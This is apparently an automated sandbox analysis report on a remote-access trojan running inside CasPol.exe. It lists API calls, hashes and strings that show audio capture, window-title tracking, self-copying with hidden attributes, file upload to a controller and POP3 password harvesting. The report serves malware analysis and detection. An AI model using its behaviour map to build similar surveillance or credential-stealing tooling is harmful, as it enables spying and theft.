                                                                                                                  • Opcode ID: 4fbe5e964353057208d63472bf77b8e21c80dda7ec5e7c4c15e1be7b02e28e2a
                                                                                                                  • Instruction ID: f1dcdd4a9e546d4cb200c8239a9b7392f8c22d31b5939825df829b517cfed74e
                                                                                                                  • Opcode Fuzzy Hash: 4fbe5e964353057208d63472bf77b8e21c80dda7ec5e7c4c15e1be7b02e28e2a
                                                                                                                  • Instruction Fuzzy Hash: 088190316042005BC315FB21D852ABF77A9ABD1308F10453FF986A71E2EF7CAD49869E
APIs
• mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
• mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
• mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
• mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
• mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
• SetEvent.KERNEL32 ref: 0041A39A
• WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
• CloseHandle.KERNEL32 ref: 0041A3BB
• mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
• mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
• String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
• API String ID: 738084811-1408154895
• Opcode ID: 34c9b7c386d9b976f4a833e2789a2a9ffd4d080efd6be91700f5a66860160ded
• Instruction ID: 916def08b3adcafa46b043c64cdff30cc67d21214e861a912cda69be872b019d
• Instruction Fuzzy Hash: B951C1712442056AD214BB31DC86EBF3B9CDB91758F10043FF456A21E2EF389D9986AF
APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
• WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
• WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
• WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
• WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
• WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
• WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
• WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
• WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
• WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$Write$Create
• String ID: RIFF$WAVE$data$fmt
• API String ID: 1602526932-4212202414
• Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
• Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
• Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
• GetProcAddress.KERNEL32(00000000), ref: 004064FD
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
• GetProcAddress.KERNEL32(00000000), ref: 00406511
• GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
• GetProcAddress.KERNEL32(00000000), ref: 00406525
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
• GetProcAddress.KERNEL32(00000000), ref: 00406539
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
• GetProcAddress.KERNEL32(00000000), ref: 0040654D
• GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
• GetProcAddress.KERNEL32(00000000), ref: 00406561
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
• API String ID: 1646373207-165202446
• Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
• Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
• Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
APIs
• _wcslen.LIBCMT ref: 0040BC75
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
• CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
• _wcslen.LIBCMT ref: 0040BD54
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
• CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040BDF2
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
• _wcslen.LIBCMT ref: 0040BE34
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
• ExitProcess.KERNEL32 ref: 0040BED0
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
• String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open$BG$BG
• API String ID: 1579085052-1280438975
• Opcode ID: 2d304c15f4e1f7a33ee26e5bac1824232192d3ef6427a9269418118ddfb41cfb
• Instruction ID: 2f106158a8217a69bc194f5c9bf89c81f007fa4859a00edafeef48886470f02c
• Instruction Fuzzy Hash: DC51B1212082006BD609B722EC52E7F77999F81719F10443FF985A66E2DF3CAD4582EE
APIs
  • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
  • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
  • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
• _strlen.LIBCMT ref: 10001855
• _strlen.LIBCMT ref: 10001869
• _strlen.LIBCMT ref: 1000188B
• _strlen.LIBCMT ref: 100018AE
• _strlen.LIBCMT ref: 100018C8
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: _strlen$File$CopyCreateDelete
• String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
• API String ID: 3296212668-3023110444
• Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
• Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
APIs
• lstrlenW.KERNEL32(?), ref: 0041B1E6
• _memcmp.LIBVCRUNTIME ref: 0041B1FE
• lstrlenW.KERNEL32(?), ref: 0041B217
• FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
• lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
• _wcslen.LIBCMT ref: 0041B2EB
• FindVolumeClose.KERNEL32(?), ref: 0041B30B
• GetLastError.KERNEL32 ref: 0041B323
• GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
• lstrcatW.KERNEL32(?,?), ref: 0041B369
• lstrcpyW.KERNEL32(?,?), ref: 0041B378
• GetLastError.KERNEL32 ref: 0041B380
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
• String ID: ?
• API String ID: 3941738427-1684325040
• Opcode ID: 253fbf654c2f5cfaca5092a796830cee54c98e46980e450b9e065df1a1912948
• Instruction ID: cf02e0f6f7b7a0e02f5bf76754478950043962dc0518326da89db1c5b002f683
• Instruction Fuzzy Hash: CC4163715087099BD7209FA0EC889EBB7E8EF44755F00093BF951C2261E778C998C7D6
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _strlen
                                                                                                                  • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                  • API String ID: 4218353326-230879103
                                                                                                                  • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                  • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                  • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                  • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3899193279-0
                                                                                                                  • Opcode ID: 3115d919f98adbdf348e15764fef8bbbb7a878b40742b6c11840eb3b67a2620e
                                                                                                                  • Instruction ID: 310171947c9992e3776b826429fe42b14e002c37e8c837d056816c81c4ebeb3e
                                                                                                                  • Opcode Fuzzy Hash: 3115d919f98adbdf348e15764fef8bbbb7a878b40742b6c11840eb3b67a2620e
                                                                                                                  • Instruction Fuzzy Hash: A7D13A71900310AFFB35AF7B888266E77A4BF06328F05416FF905A7381E6799D418B99
                                                                                                                  APIs
                                                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                  • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                  • API String ID: 2490988753-744132762
                                                                                                                  • Opcode ID: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                                                                                                  • Instruction ID: f97e29e5006070a0e8b03c0efb597ee3aef86c3529fe4be05370ae17daaf5a45
                                                                                                                  • Opcode Fuzzy Hash: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                                                                                                  • Instruction Fuzzy Hash: C331C4B1906315ABD320AF65DC44ACBB7ECEF44745F400A2AF844D7201D778DA858AEE
                                                                                                                  APIs
                                                                                                                  • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                                  • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                                    • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                  • String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
                                                                                                                  • API String ID: 911427763-1497357211
                                                                                                                  • Opcode ID: 30f4195c6794a9366bb2de9f07a7a45867c5670f1fc2455abb98f24b207642f8
                                                                                                                  • Instruction ID: afbd458ed10e5c7c401a96cf43e60d64e5e0c384de04be689a5a7141a0feef4c
                                                                                                                  • Opcode Fuzzy Hash: 30f4195c6794a9366bb2de9f07a7a45867c5670f1fc2455abb98f24b207642f8
                                                                                                                  • Instruction Fuzzy Hash: 8851B1716043409BC224FB21D85AAAE7794BF84318F40493FF846A72D2DF7C9D55869F
                                                                                                                  APIs
                                                                                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
                                                                                                                  • GetCursorPos.USER32(?), ref: 0041CB08
                                                                                                                  • SetForegroundWindow.USER32(?), ref: 0041CB11
                                                                                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
                                                                                                                  • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
                                                                                                                  • ExitProcess.KERNEL32 ref: 0041CB84
                                                                                                                  • CreatePopupMenu.USER32 ref: 0041CB8A
                                                                                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                  • String ID: Close
                                                                                                                  • API String ID: 1657328048-3535843008
                                                                                                                  • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                  • Instruction ID: 3771bb7a8ff115e6e52fbd1847cd0ce42a02f589590b945df095e749b0e49bf2
                                                                                                                  • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                  • Instruction Fuzzy Hash: FF212A31148205FFDB064F64FD4EEAA3F25EB04712F004035B906E41B2D7B9EAA1EB18
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$Info
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2509303402-0
                                                                                                                  • Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                  • Instruction ID: 94cb3ffe265cc5bcc4c1ad3ae65ec97d3e38ea61109583f3198c5827e9e35c68
                                                                                                                  • Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                  • Instruction Fuzzy Hash: 22B19D71900A05AFEF11DFA9C881BEEBBB5FF09304F14416EE855B7342DA799C418B64
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                                  • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                                  • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                                  • API String ID: 1884690901-3066803209
                                                                                                                  • Opcode ID: 157b890a00aff1dc93243e7f043ac0f1883b9fb4f689d54900e142c2c42143bb
                                                                                                                  • Instruction ID: 4837f293f8898be8956b4197083d1ab2d903a2927be0ecc228378ed3697c5d3b
                                                                                                                  • Opcode Fuzzy Hash: 157b890a00aff1dc93243e7f043ac0f1883b9fb4f689d54900e142c2c42143bb
                                                                                                                  • Instruction Fuzzy Hash: 01B191715083409BC214FB25C892BAFB7E5ABD4314F40493EF889632D2EF789945CB9B
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                                    • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                    • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                    • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                    • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                                    • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                  • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                                  • API String ID: 3795512280-3163867910
                                                                                                                  • Opcode ID: 8cbf3e03678dcba0d5ddb4510c41cf15fce6de350b9b6fd6a72f9d7f6d16f9a3
                                                                                                                  • Instruction ID: 8be46055dc56f0d2ec4b071ca6400761e29966989419bbb2416efbd82a73718c
                                                                                                                  • Opcode Fuzzy Hash: 8cbf3e03678dcba0d5ddb4510c41cf15fce6de350b9b6fd6a72f9d7f6d16f9a3
                                                                                                                  • Instruction Fuzzy Hash: 06517C616043005ACB05BB71D866ABF769AAFD1309F00053FF886B71E2DF3DA945869A
APIs
• ___free_lconv_mon.LIBCMT ref: 004500C1
  • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
  • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
  • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
  • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
  • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
  • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
  • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
  • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
  • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
  • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
  • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
  • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
  • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8
• _free.LIBCMT ref: 004500B6
  • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
  • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
• _free.LIBCMT ref: 004500D8
• _free.LIBCMT ref: 004500ED
• _free.LIBCMT ref: 004500F8
• _free.LIBCMT ref: 0045011A
• _free.LIBCMT ref: 0045012D
• _free.LIBCMT ref: 0045013B
• _free.LIBCMT ref: 00450146
• _free.LIBCMT ref: 0045017E
• _free.LIBCMT ref: 00450185
• _free.LIBCMT ref: 004501A2
• _free.LIBCMT ref: 004501BA
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
• Instruction ID: 71386be3831ae4e36ed8ba8c0666741f952bc44bbd11cc85bbb3aa2ad55dcdb0
• Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
• Instruction Fuzzy Hash: D5318135600B009FEB30AA39D845B5773E9EF02325F11842FE849E7692DF79AD88C719
APIs
• ___free_lconv_mon.LIBCMT ref: 10007D06
  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
